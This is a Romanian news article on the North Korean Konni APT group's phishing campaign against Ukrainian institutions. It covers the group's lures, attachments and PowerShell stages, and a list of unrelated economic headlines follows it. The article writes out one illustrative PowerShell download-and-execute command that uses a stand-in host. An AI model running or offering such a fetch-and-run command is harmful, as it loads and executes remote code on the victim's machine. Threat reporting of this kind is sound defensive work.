Prima pagină » Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Gruparea nord-coreeană de spionaj cibernetic Konni APT a lansat un atac informatic îndreptat împotriva Ucrainei prin care vizează în special instituțiile guvernamentale.

Această ofensivă digitală are ca scop monitorizarea conflictului ruso-ucrainean și colectarea de date despre strategiile militare ale Kremlinului.

Cine sunt Konni APT?

Coreea de Nord

Konni APT, cunoscută și sub denumirile de Opal Sleet, Osmium, TA406 și Vedalia, este o grupare nord-coreeană de spionaj cibernetic. Activ de peste un deceniu, grupul a țintit entități guvernamentale din Coreea de Sud, Statele Unite, Rusia și, mai nou, Ucraina.

Arma principală a nord-coreenilor se numește Konni RAT (n.n. – Remote Access Trojan), cunoscut și ca UpDog. Este vorba despre un program malware (software rău intenționat) versatil, care le permite supravegherea continuă și chiar controlul total al dispozitivelor compromise.

Cea mai recentă campanie a hackerilor Konni a început în februarie 2025. Aceasta vizează colectarea de informații cu privire la „traiectoria invaziei ruse” în Ucraina, potrivit Medium.com. Departe de a se limita la interceptarea comunicațiilor, malware-ul vizează perspective strategice, politice și militare, care pot influența deciziile Phenianului în ceea ce privește sprijinul acordat Rusiei în acest conflict militar.

Phishing mascat în expertiză geopolitică

Foto: Proofpoint.com

Tactica preferată a atacatorilor presupune trimiterea de e-mailuri aparent inofensive, dar atent fabricate, care se dau drept comunicări din partea unor așa-zise grupuri de experți în politică și securitate.

Potrivit Proofpoint, o firmă de top în domeniul securității informatice pentru întreprinderi, mesajele fac referire la subiecte sensibile din actualitatea ucraineană. Este vorba despre destituiri la nivel înalt în armata ucraineană sau alegerile prezidențiale din Ucraina pentru a câștiga încrederea destinatarilor.

Odată ce victima deschide fișierul atașat, care de obicei este o arhivă RAR cu parolă denumită „Analytical Report.rar”, se execută un fișier CHM capabil să lanseze un script PowerShell. Acesta inițiază o etapă secundară a atacului informatic, descărcând alte scripturi menite să extragă informații sensibile, să stabilească accesul pe termen lung și, probabil, să pregătească terenul pentru un backdoor personalizat.

De obicei, hackerii Konni APT se bazează pe platforme gratuite precum Gmail, Outlook sau ProtonMail pentru a trimite în mod repetat mesajele periculoase, iar descărcările sunt găzduite pe servicii precum MEGA. În unele variante ale atacurilor au fost detectate și metode alternative, precum fișiere HTML care duc la arhive ZIP cu fișiere LNK și PDF. Aparent inofensive, acestea ascund componente malware capabile să execute comenzi VBScript și PowerShell, relatează Cybersecuritynews.com.

O structură tipică de comenzi ar putea semăna cu: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command „$c=’IEX (New-Object Net.WebClient).DownloadString(”http://compromised-server.com/payload.ps1”)’; iex $c”

Deși payload-ul final nu a fost identificat de cercetători în toate cazurile, toate indiciile duc spre existența unei componente de tip backdoor, concepută să faciliteze supravegherea de lungă durată și eventuale acțiuni de sabotaj digital.

Ce urmărește Konni APT

Experții în securitate cibernetică spun că scopul acestor atacuri este de a oferi regimului de la Phenian o imagine clară a angajamentului militar ucrainean, dar și a gradului de implicare al Rusiei.

Se bănuiește că aceste date ar putea influența deciziile liderilor nord-coreeni în ceea ce privește eventuale mișcări suplimentare, fie trimiterea de personal militar, fie furnizarea de armament către Moscova.

Gruparea nord-coreeană nu se află la primul atac de acest gen. Konni a desfășurat anterior operațiuni de tip spear phishing menite să compromită conturi de e-mail, folosind alerte false de securitate Microsoft pentru a colecta acreditări. De exemplu, au circulat mesaje care avertizau despre „activitate suspectă de autentificare”, redirecționând victimele către site-uri capcană precum „jetmf[.]com”.

Alte articole importante
Suspiciuni privind adaosurile dintre fermieri și supermarketuri. Ministrul Agriculturii cere intervenția Consiliului Concurenței
Suspiciuni privind adaosurile dintre fermieri și supermarketuri. Ministrul Agriculturii cere intervenția Consiliului Concurenței
Ministrul Agriculturii atrage atenția asupra unor diferențe majore de preț care apar între poarta fermei și rafturile magazinelor și solicită verificări oficiale privind modul în care sunt stabilite adaosurile comerciale de-a lungul lanțului alimentar. Oficialul susține că aceste mecanisme ar putea afecta atât fermierii români, cât și consumatorii, motiv pentru care a cerut o analiză […]
Cinci motive pentru care petrolul ar putea rămâne scump mult timp după încheierea războiului cu Iranul
Cinci motive pentru care petrolul ar putea rămâne scump mult timp după încheierea războiului cu Iranul
Conflictul declanșat în Orientul Mijlociu între Statele Unite și Iran riscă să aibă consecințe economice mult mai durabile decât durata efectivă a operațiunilor militare. Chiar dacă administrația condusă de Donald Trump vorbește despre o criză temporară a piețelor energetice, numeroși analiști avertizează că revenirea la nivelurile anterioare ale prețului petrolului ar putea dura luni sau […]
BVB a închis pe roșu ședința de vineri. Majoritatea indicilor au înregistrat scăderi
BVB a închis pe roșu ședința de vineri. Majoritatea indicilor au înregistrat scăderi
Ședința de tranzacționare de vineri s-a încheiat cu scăderi pentru majoritatea indicilor de la Bursa de Valori București (BVB), într-un context de tranzacționare moderată și variații limitate ale cotațiilor. Valoarea totală a tranzacțiilor realizate pe piața principală s-a ridicat la 56,04 milioane de lei, echivalentul a aproximativ 10,99 milioane de euro. Indicele de referință al […]
Prognoză neagră: motorina ar putea atinge pragul de 10 lei/litru
Prognoză neagră: motorina ar putea atinge pragul de 10 lei/litru
Motorina s-ar putea scumpi semnificativ în perioada următoare din cauza creșterii prețului petrolului pe piețele internaționale. Dacă tendința actuală se va menține, analiștii avertizează că până, la sfârșitul lunii martie litrul de motorină ar putea ajunge în România la pragul psihologic de 10 lei. Motorina ar putea ajunge la 10 lei pe litru până la […]
Restructurări masive la uzina Dacia: vor pleca 1.200 de angajați
Companii
Restructurări masive la uzina Dacia: vor pleca 1.200 de angajați
Producătorul de automobile Dacia anunță restructurări masive în cadrul companiei, care vor viza aproximativ 1.200 de angajați. Decizia face parte dintr-un plan de eficientizare a activităților în cadrul societății, precum și de adaptare la schimbările din industria auto. Dacia anunță noi plecări: 1.200 de angajați își vor pierde locul de muncă Sindicatul Autoturisme Dacia (SAD) […]
Salariul mediu net a scăzut la începutul anului 2026. Reducere de aproape 400 de lei într-o singură lună
Salariul mediu net a scăzut la începutul anului 2026. Reducere de aproape 400 de lei într-o singură lună
Salariul mediu net din România a coborât în ianuarie 2026 la 5.518 lei, înregistrând o scădere semnificativă față de luna precedentă. Datele publicate de Institutul Național de Statistică arată că salariul mediu net a fost mai mic cu 396 de lei, ceea ce reprezintă un recul de 6,7% comparativ cu decembrie 2025. În același timp, […]